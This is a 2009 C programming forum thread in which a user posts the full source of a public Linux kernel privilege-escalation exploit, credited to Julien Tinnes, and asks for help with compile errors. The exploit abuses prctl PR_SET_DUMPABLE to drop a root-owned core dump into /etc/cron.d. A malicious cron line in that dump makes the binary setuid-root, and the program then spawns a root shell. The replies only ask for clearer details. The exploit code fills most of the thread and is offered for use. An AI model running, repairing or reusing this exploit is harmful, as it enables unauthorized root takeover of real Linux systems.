Go4Expert

Go4Expert (http://www.go4expert.com/)
-   C (http://www.go4expert.com/forums/c/)
-   -   some problmes (http://www.go4expert.com/forums/some-problmes-t18940/)

mohammed saud 9Aug2009 13:31

some problmes
 
Code:

:cryin:/* Linux >= 2.6.13 prctl kernel exploit
 *
 * (C) Julien TINNES
 *
 * If you read the Changelog from 2.6.13 you've probably seen:
 *  [PATCH] setuid core dump
 *
 * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
 * user setable argument to PR_SET_DUMPABLE.
 *
 * This flaw allows us to create a root owned coredump into any directory.
 * This is trivially exploitable.
 *
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>

#define CROND "/etc/cron.d"
#define BUFSIZE 2048


struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

char    crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * *    root    chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";

char    cronstring[BUFSIZE];
char    fname[BUFSIZE];

struct timeval te;

void sh(int sn) {
    execl(fname, fname, (char *) NULL);
}
   

int    main(int argc, char *argv[]) {

    int nw, pid;

    if (geteuid() == 0) {
        printf("[+] getting root shell\n");
        setuid(0);
        setgid(0);
        if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
            perror("[-] execle");
            return 1;
        }
    }

    printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");

    /* get our file name */
    if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
        perror("[-] readlink");
        printf("This is not fatal, rewrite the exploit\n");
    }

    if (signal(SIGUSR1, sh) == SIG_ERR) {
        perror("[-] signal");
        return 1;
    }
    printf("[+] Installed signal handler\n");

    /* Let us create core files */
    setrlimit(RLIMIT_CORE, &myrlimit);
    if (chdir(CROND) == -1) {
        perror("[-] chdir");
        return 1;
    }

    /* exploit the flaw */
    if (prctl(PR_SET_DUMPABLE, 2) == -1) {
        perror("[-] prtctl");
        printf("Is you kernel version >= 2.6.13 ?\n");
        return 1;
    }

    printf("[+] We are suidsafe dumpable!\n");

    /* Forge the string for our core dump */
    nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
    if (nw >= sizeof(cronstring)) {
        printf("[-] cronstring is too small\n");
        return 1;
    }
    printf("[+] Malicious string forged\n");

    if ((pid=fork()) == -1) {
        perror("[-] fork");
        return 1;
    }

    if (pid == 0) {
        /* This is not the good way to do it ;) */
        sleep(120);
        exit(0);
    }

    /* SEGFAULT the child */
    printf("[+] Segfaulting child\n");
    if (kill(pid, 11) == -1) {
        perror("[-] kill");
        return 1;
    }
    if (gettimeofday(&te, NULL) == 0)
        printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
    sleep(120);

    printf("[-] It looks like the exploit failed\n");

    return 1;
}

/ I wrot by linux in the terminl it's take for me message some cood problems
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

please and please and please help meeeeeeeeeeeee:cryin:

xpi0t0s 9Aug2009 15:28

Re: some problmes
 
Please:
(a) Use code blocks when posting code
(b) DO NOT post duplicate threads http://www.go4expert.com/showthread.php?t=18939
(c) be more clear about precisely what help you need and provide all relevant details (which may in this case include some error messages, but to be honest I really can't decode "I wrot by linux in the terminl it's take for me message some cood problems" so it's difficult to guess what details may be relevant.)

shabbir 9Aug2009 16:58

Re: some problmes
 
I deleted other thread.


All times are GMT +5.5. The time now is 03:18.